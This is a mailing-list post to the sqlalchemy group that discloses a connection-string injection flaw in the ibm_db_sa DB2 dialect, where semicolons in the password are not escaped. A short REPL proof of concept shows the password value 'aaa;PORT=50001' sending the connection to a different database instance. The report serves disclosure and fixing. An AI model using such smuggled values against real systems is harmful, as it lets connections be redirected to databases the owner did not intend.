Hi, I discovered an issue in db engine creation code. when the code prepares the db connection string it fails to escape the semicolon char. This makes it possible to inject arbitrary parameters in the connection string. Under some circumstances this can be a security issue.
PoC: I created two db2 instances in docker one is listening on tcp/50000 (default) and the other is on tcp/50001. ActivePython 2.7.8.10 (ActiveState Software Inc.) based on Python 2.7.8 (default, Jul 2 2014, 19:48:49) [MSC v.1500 64 bit (AMD64)] on win32 Type "help", "copyright", "credits" or "license" for more information. >>> import sqlalchemy >>> from sqlalchemy import * >>> import ibm_db_sa >>> from urllib import quote >>> import sys >>> >>>* pw="aaa"* >>> db2 = sqlalchemy.create_engine('ibm_db_sa://db2inst1:%s@192.168.99.100/test' % quote(pw)) >>> conn = db2.connect() >>> conn.execute("select host_name from TABLE(SYSPROC.ENV_GET_SYS_INFO()) AS SYSTEMINFO").fetchall() *[(u'b5b9411e889e',)]* >>> conn.close() >>> >>>* pw="aaa;PORT=50001"* >>> db2 = sqlalchemy.create_engine('ibm_db_sa://db2inst1:%s@192.168.99.100/test' % quote(pw)) >>> conn = db2.connect() >>> conn.execute("select host_name from TABLE(SYSPROC.ENV_GET_SYS_INFO()) AS SYSTEMINFO").fetchall() *[(u'e6aa666c18bf',)]* >>> conn.close() >>> sqlalchemy.__version__ '0.9.8' As you can see I was able to trick the program to connect to an alternative database via the password. (Which is a realistic vector I think.) My sqlalchemy version is not the latest because I installed it from the ActiveState repo. If you've already fixed this then ignore my message. Unfortunately I don't have time to further test this with other versions or DB drivers. Regards Miklós -- You received this message because you are subscribed to the Google Groups "sqlalchemy" group. To unsubscribe from this group and stop receiving emails from it, send an email to sqlalchemy+unsubscr...@googlegroups.com. To post to this group, send email to sqlalchemy@googlegroups.com. Visit this group at https://groups.google.com/group/sqlalchemy. For more options, visit https://groups.google.com/d/optout.